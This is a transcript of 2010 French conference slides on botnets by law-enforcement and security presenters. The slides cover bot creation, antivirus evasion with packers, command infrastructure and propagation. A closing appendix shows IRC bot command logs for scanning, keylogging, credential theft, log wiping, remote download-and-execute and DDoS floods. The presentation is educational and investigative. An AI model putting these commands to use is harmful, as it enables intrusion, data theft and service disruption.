Colloque cyber 2010 les botnets

57
1 Les Botnets Colloque sur la cybercriminalité Avril 2010

Transcript of Colloque cyber 2010 les botnets

Page 1: Colloque cyber 2010   les botnets

1

Les BotnetsColloque sur la cybercriminalité

Avril 2010

Page 2: Colloque cyber 2010   les botnets

2

Alain Rioux, CISSP

• Sergent spécialiste, MVDI, BCEDI, Sûreté du Québec, depuis 2005

• Certifications CISSP, GREM

• Certificat en informatique, ULaval

• « Operation Basique »

• Microsoft LETech 2006‐2008

• Gold ILECA 2008, Bangkok, Thaïlande

• Polytechnique, SANS (mentorat)

• Développeur

Page 3: Colloque cyber 2010   les botnets

3

Michel Cusin, CISSP

• Consultant en sécurité, Bell Canada

• Mentor/instructeur SANS Institute

• Certifications CISSP, CEH, GCIH, OPST, etc…

• Site cusin.ca

Page 4: Colloque cyber 2010   les botnets

4

Les Botnets

Serveur de commande

BotBotBotBotBot

Suspect

Page 5: Colloque cyber 2010   les botnets

5

Les Botnets

• Le programme de bot

• Création d’un bot

• Infrastructure du botnet

• La propagation

• Autres types de bot

• Commandes diverses

• Utilisation du botnet

Page 6: Colloque cyber 2010   les botnets

6

Le programme

• Code source compilé en exécutable (.exe)

• Les grandes familles : – Agobot/Phatbot/ForBot/XtremBot

– SdBot/Rbot/UrBot/RxBot/UrxBot/JrBot

• Intègre le ver et le robot IRC

• Peut se retrouver sous différentes variantes (Ex. NZM, RoseBot, Ruffbot, etc.)

Page 7: Colloque cyber 2010   les botnets

7

Création

• Les étapes :– Code source récupéré sur Internet ou autre moyen

– Configuration

– Compilation

– Compression/Chiffrement

– Test

Page 8: Colloque cyber 2010   les botnets

8

Création

• Code source

• Configuration– Fichier de configuration

• Ex. StBot (Stable Bot) 1.0

– Générateur de configuration

• Ex. Agobot• Compilation

– Ex. MS Visual Studio, GCC, etc.

Page 9: Colloque cyber 2010   les botnets

9

Création

• Générateur d’exécutable

www.megasecurity.org

Page 10: Colloque cyber 2010   les botnets

10

Création

• Packing : Compression/Chiffrement– Réduire la taille de l’exécutable

– Éviter la détection par les anti‐virus

– Protéger le code contre la rétro‐ingénierie

• Outil : le packer

• Ex. UPX, Armadillo, PECompact, RLPack, Neolite, Morphine, Themida, PELock, etc.

Page 11: Colloque cyber 2010   les botnets

11

Création

Page 12: Colloque cyber 2010   les botnets

12

Test

• Antivirus en ligne (multi‐moteurs)– www.virustotal.com

– virusscan.jotti.org

– www.novirusthanks.org

– virus‐trap.org

– www.virscan.org

– www.viruschief.com

– www.filterbit.com

Page 13: Colloque cyber 2010   les botnets

13

Page 14: Colloque cyber 2010   les botnets

14

Infrastructure

• Serveur de commande et contrôle– Type : IRC, HTTP, P2P, etc.

– Hébergement

– Adresse IP ou nom de domaine

• Hébergement des ressources (programme de bots pour les mises à jour)

• Si nom de domaine, enregistrement et DNS

Page 15: Colloque cyber 2010   les botnets

15

Infrastructure

• Type de serveur– IRC

• Simple, rapide, documentée et disponibilité

• Moins convivial (ligne de commande), Pare‐feu

• Ex. UnRealIRCd, BewareIRCd, Ultimate, InspIRCd, etc.

– HTTP• Port 80 (Pare‐feu), Convivial (GUI en HTML)

– P2P• Décentralisé

Page 16: Colloque cyber 2010   les botnets

16

Infrastructure

Page 17: Colloque cyber 2010   les botnets

17

Infrastructure

Source : securitylabs.websense.com

Page 18: Colloque cyber 2010   les botnets

18

InfrastructureS

ourc

e : p

anda

secu

rity.

com

Page 19: Colloque cyber 2010   les botnets

19

Infrastructure

• Hébergement– Un ordinateur du pirate ou un ami

– Un serveur IRC existant (Ex. Undernet)

– Un serveur dédié (payé frauduleusement ou non)

– Un bot performant (serveur ou non)

– Une grappe de bots performants (cluster)

• Hébergement des ressources– Fournisseurs gratuits (iquebec.com, voila.fr, freewebs.com, etc.)

Page 20: Colloque cyber 2010   les botnets

20

Infrastructure

• DNS– DNS dynamique : un domaine, une adresse IP variable : ex.No‐IP.org, dyndns.com, yi.org, etc.

– DNS Round Robbin (un domaine, plusieurs adresses IP choisies en alternance)

– DNS Netmaskordering (Comme RR, mais avec priorité basée sur la comparaison des masques)

N.B. : Le nom de domaine pointe directement sur le serveur de

commande et contrôle. Ceci représente le point le plus

vulnérable du botnet. Solution : Le Fast‐Flux.

Page 21: Colloque cyber 2010   les botnets

21

Fast‐flux

Single‐Flux

Source : www.xmcopartners.com

Page 22: Colloque cyber 2010   les botnets

22

Fast‐flux 

Double‐flux

Source : www.xmcopartners.com

Page 23: Colloque cyber 2010   les botnets

23

Infrastructure

• Encore plus loin : Web 2.0 Botnet– Twitter

– Facebook

– Google/Ajax

– Etc.

Page 24: Colloque cyber 2010   les botnets

24

Propagation

• Deux activités : Balayage (scan) et Infection

• Dans  un  bot  traditionnel,  c’est  le  ver  qui accomplit ces tâches,  il peut être autonome ou semi‐autonome

• Il recherche une ou plusieurs vulnérabilités (Ex. DCOM, SMB, ASN, VNC, etc.) 

• Démonstration : Autonome

Page 25: Colloque cyber 2010   les botnets

25

Autonome

Page 26: Colloque cyber 2010   les botnets

26

Autonome

Page 27: Colloque cyber 2010   les botnets

27

Semi‐autonome

Serveur de commande

Scan 24.72.x.x ->Faille x

Bot

Bot

Bot

Bot

Suspect

24.72.130.224

24.72.130.225Faille x présente

24.72.130.226

Page 28: Colloque cyber 2010   les botnets

28

Semi‐autonome

Serveur de commande

Bot

Bot

Bot

Suspect

Bot : 24.72.130.225

Bot

Page 29: Colloque cyber 2010   les botnets

29

Semi‐autonome

Commande de balayage :

Pirate!kktr@Longueuil‐A31682EC.mc.videotron.ca TOPIC #botnet : .advscan asn1smb 75 5 0 201.4.x.x

Balayage commandé et infection automatique : 

CAN|XP|SP1|00|2633|W|548!eabt@142‐217‐78‐77.telebecinternet.net PRIVMSG #botnet :FTP File transfercomplete: 201.4.134.6     Infection par un autre bot

BRA|XP|SP1|00|1500|W|[email protected] JOIN : #botnet Nouveau bot

BRA|XP|SP1|00|1500|W|[email protected] PRIVMSG #botnet : [SCAN]: Random Port Scan started on 201.4.x.x:445 with a delay of 5 seconds for 0 minutes using 75 threads. 

CAN|XP|SP1|00|2633|W|548!eabt@142‐217‐78‐77.telebecinternet.net PRIVMSG #botnet :FTP File transfercomplete: 201.4.136.102

BRA|XP|SP0|00|3066|W|[email protected] JOIN : #botnet

BRA|XP|SP0|00|3066|W|[email protected] PRIVMSG #botnet : [SCAN]: Random Port Scan started on 201.4.x.x:445 with a delay of 5 seconds for 0 minutes using 75 threads.

Page 30: Colloque cyber 2010   les botnets

30

Vulnérabilités

Statistiques d’infection :

<@Pirate> .stats

<CAN|XP|SP1|00|2633|W|548> [SCAN]: Exploit Statistics: Dcom135: 0, Dcom445: 0, Dcom1025: 0, asn1http: 0, 

asn1smb: 4625, asn1smbnt: 0, vnc: 0, netapi: 0, sym: 0, Total: 4625

Balayage VNC (faille authbypass) :

<@Pirate> .asc vnc 100 5 200 170.x.x.x ‐s

<[F]CZE|765771811> ‐ Vnc ‐ trying to root 170.123.234.19 ‐ nopass ;)  ‐

<BRA|137791145> ‐ Vnc ‐ 170.123.213.191 ‐ password ‐:12345

<ESP|37523> ‐ Vnc ‐ 170.126.235.164 ‐ password ‐:12345

<[F]POL|962379907> ‐ Vnc ‐ 170.126.165.91 ‐ password ‐:123456

Page 31: Colloque cyber 2010   les botnets

31

Autres types

• Autres types de bots– IRC Bot

– « Web » Bot

– Autres outils

Page 32: Colloque cyber 2010   les botnets

32

Le IRC Bot

• Robot IRC convertit en méchant Robot– Exemple de Robot IRC : Eggdrop, Windrop, EnergyMech (Emech), Cygmech, WinMech, Darkbot, etc.

• Modifications : Furtivité, Porte dérobée, etc.

• Pas de ver intégré

• Installation « à la main »

• Démonstration : Eggdrop

Page 33: Colloque cyber 2010   les botnets

33

Le Web Bot

• Créé avec les nouveaux langages du Web : Java, PHP, ASP, Perl, etc.

• Ciblent précisément les serveurs Web– Exemples : 

• W32.Storm.Worm (2001)

• PHP Bot

Page 34: Colloque cyber 2010   les botnets

34

PHP Bot

• Bot écrit en PHP

• Exploite le RFI

Page 35: Colloque cyber 2010   les botnets

35

Autres outils

• BNC ou bouncer : plus qu’un proxy IRC, permet de maintenir une connexion permanente. Ex. PsyBNC

• Vhost : Avec BNC ou HostServ

Page 36: Colloque cyber 2010   les botnets

36

Conclusion

• Conséquences et utilisations des botnets

– Perturbation  des  communications :  volontaire (flood)  ou  involontaire  (consommation  de ressources comme les pourriels)

– Perturbation  des  systèmes :  Infection  virale,  coût en ressources humaines et matériels (ex. antivirus)

– Fraude au clic : régies publicitaires, concours, etc.

– Warez : vol de licences, hébergement sur les bots

– Web Defacement et méfaits : attaques DDoS

Page 37: Colloque cyber 2010   les botnets

37

Conclusion

– Vol d’identité de masse : pstore, sniffer, keylogger, accès aux fichiers

– Hameçonnage : hébergement du faux site, serveur SMTP pour  les pourriels, obtention d’accès sur des sites bancaires

– Extorsion : menace d’utilisation du botnet

– Espionnage et vol de données

– Cyberterrorisme

– Cyberguerre

Page 38: Colloque cyber 2010   les botnets

38Source : www.nytimes.com

Page 39: Colloque cyber 2010   les botnets

39

Conclusion

• À venir

– La prévention

– La détection

– L’éradication (décontamination)

– L’investigation

– La mise en accusation et la condamnation

Page 40: Colloque cyber 2010   les botnets

40

Questions ?

Encore plus...

Liste de commandes

Avec exemples

Page 41: Colloque cyber 2010   les botnets

41

Commandes

• Informations  sur  l’hôte :  ordinateur,  système d’exploitation, paramètres  réseau,  liste de processus, base de registre, etc.

• Informations  sur  le bot : uptime,  installation, version, liste des contrôleurs, threads, etc.

• Déplacements  :  clônage,  joindre  ou  quitter  une chambre, se reconnecter, etc.

• Démarrer un  service :  serveur HTTP,  FTP,  IRC,  SMTP, proxy, etc.

Page 42: Colloque cyber 2010   les botnets

42

Commandes

• Espionnage  et  vol  de  données :  liste  des  fenêtres actives,  capture d’écran, utiliser  la webcam, parcours du  système  de  fichiers,  vol  des  licences,  keylogger, sniffer, pstore, etc.

• Entretien  du  système :  session  distante,  effacer  les logs,  enlever  les  autres  bots,  télécharger  une mise  àjour, etc.

• Attaques et fraudes : attaques DDoS, fraudes au clic

Page 43: Colloque cyber 2010   les botnets

43

Commandes

Informations système :<@Pirate> [00|TWN|XP|SP0]‐277701 .si

<[00|TWN|XP|SP0]‐277701> ‐ sysinfo ‐ CPU : 1600MHz.  RAM : 1,048,048KB total, 1,048,048KB free.  

Disk : 20,482,840KB total, 2,578,028KB free.  OS : Windows XP (5.1, Build 2600). Sysdir : D:\WINDOWS\System32

Hostname : guiltpun‐x5q2g9 (170.125.200.173). Current User : guiltpunish.  Date : 20:Feb:2008. Time : 10:05:26.

Uptime : 0d 1h 12m.

<@Pirate> ‐uname

<zlw281> Linux somebot1.com 2.6.19.2 #2 SMP Sun Jan 14 04:15:38 CET 2007 i686 Linux

<reg279> FreeBSD somebot2.com 6.2‐STABLE FreeBSD 6.2‐STABLE #0: Tue Jan 23 12:44:26 IRKT 2007

[email protected]:/usr/obj/usr/src/sys/ISPSYSTEM i386 FreeBSD

Informations réseau :<@Pirate> .ni

<[00|USA|1821> [ NETINFO ] [Connection Type]: LAN (LAN Connection). [Internal IP]: 129.93.231.166. [External

IP]: 125.103.251.136. [Hostname]: somebot..edu. [Private]: No.[Country]: United States.[Speedtest]: Upload:

92.56 KB/s, Download: 144.35 KB/s.[Bandwidth]: Downloaded: 767MB, Uploaded: 798MB.

Page 44: Colloque cyber 2010   les botnets

44

Commandes

Liste de processus :<@Pirate> .ps list

<[P24|USA|44184]> [PROC] Process List:

<[P24|USA|44184]>  144   ‐ 60 K      ‐ "\SystemRoot\System32\smss.exe"

<[P24|USA|44184]>  168   ‐ 1,660 K   ‐ "\??\C:\WINNT\system32\csrss.exe"

<[P24|USA|44184]>  188   ‐ 2,860 K   ‐ "\??\C:\WINNT\system32\winlogon.exe"

<[P24|USA|44184]>  216   ‐ 3,076 K   ‐ "C:\WINNT\system32\services.exe"

<[P24|USA|44184]>  228   ‐ 1,440 K   ‐ "C:\WINNT\system32\lsass.exe"

<[P24|USA|44184]>  404   ‐ 2,008 K   ‐ "C:\WINNT\system32\svchost.exe"

...

<[P24|USA|44184]>  8256  ‐ 2,112 K   ‐ "C:\Program Files\Internet Explorer\iexplore.exe"

<[P24|USA|44184]>  8976  ‐ 13,020 K  ‐ "C:\Program Files\MSN Messenger\msnmsgr.exe"

<[P24|USA|44184]>  4088  ‐ 3,696 K   ‐ "C:\winnt\system32\minimech.exe"

<[P24|USA|44184]> [PROC] End of list.

Page 45: Colloque cyber 2010   les botnets

45

Commandes

Base de registre :<@Pirate> .reg query HKLM Software\Microsoft\Windows\CurrentVersion\Run

<[D01|ISR|86665]> (03) Software\Microsoft\Windows\CurrentVersion\Run\Intec Drivers32 (REG_SZ)

<[D01|ISR|86665]> (04) Software\Microsoft\Windows\CurrentVersion\Run\Intec Service Drivers (REG_SZ)

<[D01|ISR|86665]> (05) Software\Microsoft\Windows\CurrentVersion\Run\NeroCheck (REG_SZ)

...

<[D01|ISR|86665]> [ REG ] Done with query: HKLM\Software\Microsoft\Windows\CurrentVersion\Run

Threads du bot :<@Pirate> .t

<ie4[hax]‐311> [ Worms SDThreads ]

<ie4[hax]‐311> 0: Main thread

<ie4[hax]‐311> 1: Firewall/AntiVirus/Exe Killer Mood By Pirate

<ie4[hax]‐311> 2: Keys logging to C:\WINNT\system32\system.dll

<ie4[hax]‐311> 3: NTScan

<ie4[hax]‐046> 4: [Keylogger] logging to #botnet‐keylog

<ie4[hax]‐046> 5: [HTTPD] Server listening on port: 8080 root dir: c:\

<ie4[hax]‐311> [ Worm SPYThreads ]

Page 46: Colloque cyber 2010   les botnets

46

Commandes

Durée de vie (uptime) :<@Pirate> .up

<[P16|GBR|48359]> [ MAIN ] Uptime: 16 days 14:52, Record Uptime: 30 days 06:54.

Date de l’installation :<@Pirate> .it

<[P20|USA|82515]> [ MAIN ] Bot Installer Sur: 06/20/2006, 08:15 PM.

Information sur le bot :<@Pirate> !version

<ilgw845> pHp bOt v1

Liste de contrôleurs (login) :<@Pirate> .who

<[P12|USA|18490]> [ MAIN ] Login List:

<[P12|USA|18490]> <0> [email protected]

<[P12|USA|18490]> [ MAIN ] Login List complete.

Page 47: Colloque cyber 2010   les botnets

47

Commandes

Clônage :<@Pirate> .clone us.undernet.org 6667 #botnet ‐s

<BEL|87258> ‐ clones  ‐ Created on us.undernet.org:6667, in channel #botnet.

Joindre une chambre :<@Pirate> .join #botnet2

* Joins: ie[hax]‐3690 (~iehax‐51@dhcp‐0‐8‐a1‐10‐32‐76.cpe.beld.net)

Quitter une chambre :<@Pirate> .part #botnet2

* Parts: ie3[hax]‐690 (~ie3hax‐[email protected]‐37‐24.mc.videotron.ca)

Se reconnecter :<@Pirate> .reconnect

* Quits: USA|46263 (~xwyqy@adsl‐68‐92‐219‐167.dsl.hstntx.swbell.net) (Quit: reconnecting)

* Quits: USA|07769 (iogcvdu@cpe‐74‐76‐81‐213.nycap.res.rr.com) (Quit: reconnecting)

Page 48: Colloque cyber 2010   les botnets

48

Commandes

Démarrer un serveur :<@Pirate> .httpd 8080 c:\

<ie[hax]‐0724> [ HTTPD ] Server commencer sur http://somebot1.com:8080

<[04]ax]‐9323> [ HTTPD ] Server commencer sur http://somebot2.com:8080

Démarrer un proxy :<@Pirate> .redirect 9696 Oslo1.NO.EU.undernet.org 6666

<h4ck3d‐005> TCP Redirect created on port 9696 to Oslo1.NO.EU.undernet.org:6666.

<h4ck3d‐033> TCP Redirect created on port 9696 to Oslo1.NO.EU.undernet.org:6666.

Liste des fenêtres actives :<@Pirate> .aw

<ie2[hax]‐317> Fenetre active: Multicam Surveillance System 7.0.

<ie3[hax]‐778> Fenetre active: VoyagesDestination ‐ www.voyagesdestination.com ‐Mozilla Firefox.

<[30]hax]‐216> Fenetre active: Windows Live Hotmail ‐Microsoft Internet Explorer.

<ie4[hax]‐109> Fenetre active: NOD32 Scanner ‐ [Mi perfil].

<ie3[hax]‐743> Fenetre active: iTunes.

Page 49: Colloque cyber 2010   les botnets

49

Commandes

Lister les disques :<@Pirate> .di

<[00|USA|4272> [DRIVES] Listing drives:

<[00|USA|4272> Disk Drive (C:\), total: 244,196,000KB, free: 233,507,040KB, available: 233,507,040KB.

<[00|USA|4272> Disk Drive (D:\), total: 244,196,000KB, free: 243,979,700KB, available: 243,979,700KB.

<[00|USA|4272> Cdrom Drive (E:\): Failed to stat, device not ready.

<[00|USA|4272> Drive Totals (N/A), total: 488,392,000KB, free: 477,486,740KB, available: 477,486,740KB.

<[00|USA|4272> [DRIVES] End of list.

Capture d’écran :<@Pirate> .sc c:\desktop.gif

<ie4[hax]‐046> Screen capture saved to c:\desktop.gif.

Utiliser la webcam :<@Pirate> .ckeckcam

<ie3[hax]‐976> [WebCAM On] Asti de cochon que jte voille pas mespionner le cul

Page 50: Colloque cyber 2010   les botnets

50

Commandes

Vol de licences :<@Pirate> .cdkeys

<Wo|rM‐663> Microsoft Windows Product ID CD Key: (55194‐640‐0013789‐26509).

<Wo|rM‐663> [CDKEYS]: Recherche Completer.

Protected Storage Data (Internet Explorer) :<@Pirate> .pstore

<[D01|ISR|86665]> [ PSTORE ] IE Auto‐Complete: http://somesite1.com/, usager:motdepasse

<[D01|ISR|86665]> [ PSTORE ] IE Auto‐Complete: http://somesite2.com/somepage.php, usager:motdepasse

Reniflage de paquets (sniffing) :<@Pirate> .sniffer

<[00|ESP|855685]> [ SNIFFER ] Started packet sniffer.

<[00|ESP|855685]> IRC sniff "210.84.47.226:2402" to "66.54.229.120:1863": ‐ « ... »

<[00|ESP|855685]> HTTP sniff « 197.56.16.12:80" to "210.84.47.226:2501": ‐ « ... »

Page 51: Colloque cyber 2010   les botnets

51

Commandes

Enregistreur de clavier (keylogging) :<@Pirate> .keylog #botnet‐keylog

<[05]ax]‐3480> [Keylogger] Started (logging to: #botnet‐keylog)

<[05]ax]‐3480> (MSN Hotmail ‐ Nouveau message ‐Microsoft Internet Explorer):  ... ( Return )

<[05]ax]‐3480> (Courrier :: Bienvenue à Agora ‐Microsoft Internet Explorer):  ..[TAB]...[TAB][TAB] ( Return )

<ie3[hax]‐808> (Solutions en ligne ‐ AccèsD ‐Microsoft Internet Explorer): .... (Changed window)

Effacer les logs :<@Pirate> „x47x49x96

<[02|CAN|2142> ‐=[  BOT  ]=‐ Cleared 3/3 event logs.

<@Pirate> „x42x40x8Fx57x13x86xB9x22

<[02|CAN|2142> ‐=[  BOT  ]=‐ DNS cache flushed.

<@Pirate> „x42x40x8Fx57x13x83xA5x21

<[02|CAN|2142> ‐=[  BOT  ]=‐ ARP cache flushed.

Page 52: Colloque cyber 2010   les botnets

52

Commandes

Session en ligne de commande :<@Pirate> .opendos

<ie[hax]‐069> [[1]CMD[1]] Active

<ie[hax]‐069> Microsoft Windows 2000 [Version 5.00.2195]

<ie[hax]‐069> (C) Copyright 1985‐2000 Microsoft Corp.

<ie[hax]‐069> Z:\>

<@Pirate> .cmd dir

<ie[hax]‐069> dir

<ie[hax]‐069>  Volume in drive Z is System

<ie[hax]‐069>  Volume Serial Number is 1234‐35BB

<ie[hax]‐069>  Directory of Z:\

<ie[hax]‐069> 04/12/2006  09:39a      <DIR>          .

<ie[hax]‐069> 04/12/2006  09:39a      <DIR>          ..

... [Liste des fichiers] ...

<ie[hax]‐069>              194 File(s)     23,236,499 bytes

<ie[hax]‐069>               52 Dir(s)  20,903,641,088 bytes free

<ie[hax]‐069> Z:\>

Page 53: Colloque cyber 2010   les botnets

53

Commandes

« Killer » les autres bots :<@Pirate> .pl

<ie4[hax]‐548>  [System Process] System SMSS.EXE CSRSS.EXE WINLOGON.EXE SERVICES.EXE LSASS.EXE

svchost.exe ccSetMgr.exe ccEvtMgr.exe SPBBCSvc.exe spoolsv.exe DWRCS.EXE svchost.exe NPFMntor.exe

regsvc.exe mstask.exe MSupdate.exe WinMgmt.exe svchost.exe explorer.exe DWRCST.EXE nero.exe iexplore.exe

WININET.EXE ccApp.exe svchostt.exe inkjet.exe sounds.exe iexplore.exe svchostt.exe sounds.exe symlcsvc.exe

wuauclt.exe

<@Pirate> .kp svchostt.exe

Télécharger un nouveau bot :<@Pirate> .download http://membres.lycos.fr/pirate/winsys.exe winsys.exe 1  

<[21][F]RoSe444271> downloading http://membres.lycos.fr/pirate/winsys.exe...  

<[21][F]RoSe444271> downloaded 72.9 kb to winsys.exe @ 72.9 kb/sec.  

<[21][F]RoSe444271> opened winsys.exe. 

Page 54: Colloque cyber 2010   les botnets

54

Commandes

Fraude au clic ‐ Régies Publicitaires :<@Pirate> @open http://pirate.somesite.com/ Page contenant publicité

<[2]ujfgpzgmkjb> file opened.

<[2]sciuvmymwf> file opened.

Synflood :<@Pirate> !syn 24.212.36.215 113 50

<[21]USA|760760273> [SYN]: Flooding: (24.212.36.215:113) for 50 seconds.

<[5]USA|084308781> [SYN]: Flooding: (24.212.36.215:113) for 50 seconds.

<[21]USA|760760273> SYN// Done with flood (35KB/sec).

<[5]USA|084308781> SYN// Done with flood (129KB/sec).

<@Pirate> .ddosbox 208.114.100.12

<ie[hax]‐4108> DrDos Random Ack/Synflooding [208.114.100.12] for 50 seconds

<ie[hax]‐9284> DrDos Random Ack/Synflooding [208.114.100.12] for 50 seconds

<ie[hax]‐4108> Done with DrDos Random Ack/Syn flood [18KB/sec]

<ie[hax]‐9284> Done with DrDos Random Ack/Syn flood [480KB/sec]

Page 55: Colloque cyber 2010   les botnets

55

Commandes

UDP :<@Pirate> !udp 202.106.133.140 0 99999999

<ux766> Udp send to 202.106.133.140 delays 99999999 seconds

<dodh546> Udp send to 202.106.133.140 delays 99999999 seconds

<mmj996> Udp send to 202.106.133.140 delays 99999999 seconds

<@Pirate> .wisdom.udp 159.171.175.141 2048 4096 50

<USA|949449114> ‐ wisdom(udp) ‐ Sending packets to 159.171.175.141...

<[33][F]BRA|015201859> ‐ wisdom(udp) ‐ Sending packets to 159.171.175.141...

Ping :<@Pirate> .ping 24.122.166.215 1000 4096 100

<DEU|24523> ‐ ping  ‐ Sending 1000 pings to 24.122.166.215. packet size: 4096, timeout: 100(ms).

<CAN|64836> ‐ ping  ‐ Sending 1000 pings to 24.122.166.215. packet size: 4096, timeout: 100(ms).

Page 56: Colloque cyber 2010   les botnets

56

Commandes

IRC Message Flood :<@Pirate> ‐insult SomeUser Un autre usager IRC

<Oimec4945> (SomeUser) You are so stupid you couldn't pour piss out of a boot if the  instructions were written

on the bottom of the heel.

<__mech‐__> (SomeUser) There's nothing wrong with you that a miracle couldn't cure...

<PaNaDooLa> (SomeUser) For a minute there I didn't recognize you. It was the happiest minute of my life.

<IrcL3aDeR> (SomeUser) Do YOU ever get tired of having yourself around?

Une chambre, ex.. #montreal

<@Pirate> !privmsg #montreal POUHAHAHAHAHAHAHAHAHAHAHAHAHAPOUHAHAHAHAHAHAHAHAHAHAHAHA

HAPOUHAHAHAHAHAHAHAHAHAHAHAHAHAPOUHAHAHAHAHAHAHAHAHAHAHAHAHAPOUHAHAHAHAHAHAHA

HAHAHAHAHAHAPOUHAHAHAHAHAHAHAHAHAHAHAHAHAPOUHAHAHAHAHAHAHAHAHAHAHAHAHAPOUHAHA

HAHAHAHAHAHAHAHAHAHAHA

Page 57: Colloque cyber 2010   les botnets

57

Les BotnetsColloque sur la cybercriminalité

Mai 2010